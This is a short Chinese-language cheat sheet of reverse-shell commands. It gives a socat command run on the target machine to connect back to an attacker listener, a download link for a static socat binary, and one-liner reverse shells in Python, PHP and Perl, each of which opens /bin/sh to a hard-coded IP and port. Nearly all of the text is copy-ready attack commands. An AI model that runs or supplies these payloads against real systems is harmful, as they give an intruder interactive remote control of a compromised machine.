## Socat 反弹shell
Socat是Linux 下一个多功能的网络工具，名字来由是” Socket CAT”，因此可以看出它基于socket，，其功能与netcat类似，不过据说可以看做netcat的加强版,事实上的确也是如此，

[socat二进制包下载地址](https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat)

```
 ./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.0.102:12345    //靶机上运行socat反弹shell
root@kali:~# socat TCP-LISTEN:12345 -    // 攻击机执行
```
 
 ## 各种语言反弹
 攻击机机器都是执行nc或者socat
 * python脚本反弹
 ```
 python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.31.41",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
 ```
 
 * php脚本反弹
 ```
 php -r '$sock=fsockopen("192.168.0.102",12345);exec("/bin/sh -i <&3 >&3 2>&3");'
 ```
 
 * perl脚本饭堂
 ```
 perl -e 'use Socket;$i="192.168.0.102";$p=12345;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
 ```